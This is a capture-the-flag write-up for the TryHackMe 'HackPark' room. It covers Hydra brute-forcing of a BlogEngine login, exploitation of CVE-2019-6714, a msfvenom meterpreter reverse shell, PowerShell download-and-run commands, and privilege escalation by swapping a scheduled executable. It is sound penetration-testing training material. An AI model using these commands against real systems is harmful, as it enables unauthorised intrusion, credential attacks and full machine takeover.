Room Link: https://tryhackme.com/room/hackpark
Using Hydra to brute-force a login
What request type is the Windows website login form using?
Crafting request for Hydra
Sent a failed login request to Burp to see what it would look like. With this info I was able to craft my request for hydra. I just needed to get the URL and everything that is sent after VIEWSTATE and just change the input to use ^USER^ and ^PASS^ to brute force these fields.
I could also do this without burp by just opening the console and getting the info from there
Copy hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt 10.10.110.93 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=vvTqZ%2FG4tEKhQoxeTpJ%2FyGxM9ZY9ZIvd6YMUS%2BoY3uaQCjC%2BJRdlkd8rbIQsDHztL%2BjsAvOLJhxU7vTNo3GP%2FLEmsndGPNAlCDn%2FB%2FrK2ynp9QkhRe9iqKBUmM5FQT2kX%2Bg%2BfPDNnTuzqW5IlmTujw4sLEzbvvec9FDW4cbQevgTj1tHnKx0vMmkVah5imro0o%2BHvQ5%2FGvpafEs1NdnW6wrSsUFuXnYzletKCdLG%2FgSb7bCDOK4ukZK%2F1cMOgYtjOCU4gk4M7PhQcYZmGpAN7pPVCMpX2YwGnTSgBPPmCB6avoLqG5jRS%2F3PYMjsqEGcD9P9S555GMQPxtfyvOEaJw%2B%2BZELKU2yVYr4uWxamEITsWNAT&__EVENTVALIDATION=Tp%2B5DS80H3PFB8ipJ24uKyHkPhSkqKD7GFJlc2U6IaO61l68aholdIjrZJ%2FsotSi0QxRBQjayWovmb2SU%2Fk6lY%2BOpju62jOGDkAvqcdNsqGrgf3vrAYw88XT2ONABFvDTR771I2YAr7JylJ0HbBZV83nGvvXWSC6rmKDGn80%2FuszTjDZ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed" -V Compromise the machine
Now you have logged into the website, are you able to identify the version of the BlogEngine?
What is the CVE?
CVE-2019-6714
Exploit Link: https://www.exploit-db.com/exploits/46353
Using the public exploit, gain initial access to the server. Who is the webserver running as?
Created the file mentioned in the exploit, just changed the IP to my IP.
Setup a nc listener
Upload the file
Navigate to the link and the nc listener should have caught it
Windows Privilege Escalation
Setting up meterpreter shell
Kali #1
Copy msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.218.233 LPORT=1337 -e x86/shikata_ga_nai -f exe -o reverse.exe
python2 -m SimpleHTTPServer 81 Kali #2
Copy msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.218.233
set LPORT 1337
run Victim
Copy cd C:\Windows\Temp powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/reverse.exe','reverse.exe')" reverse.exe What is the OS version of this windows machine?
Further enumerate the machine. What is the name of the abnormal service running?
Check Windows Exploit Suggester
Kali
Copy git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt Transfer WinPeas
Kali
Copy wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 81 Victim
Copy cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
Copy cd C:\Program Files (x86)\SystemScheduler\Events
type 20198415519.INI_LOG.txt We can see Message.exe is kept being ran by Administrator so we just need to replace the file with our reverse shell, setup a listener and wait for the Administrator to try to run it.
Kali
Copy msfvenom -p windows/shell_reverse_tcp LHOST=10.10.218.233 LPORT=1337 -f exe -o Message.exe
python2 -m SimpleHTTPServer 81 rlwrap nc -lvnp 1337 Victim
Copy cd C:\Program Files (x86)\SystemScheduler
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/Message.exe','Message.exe')"
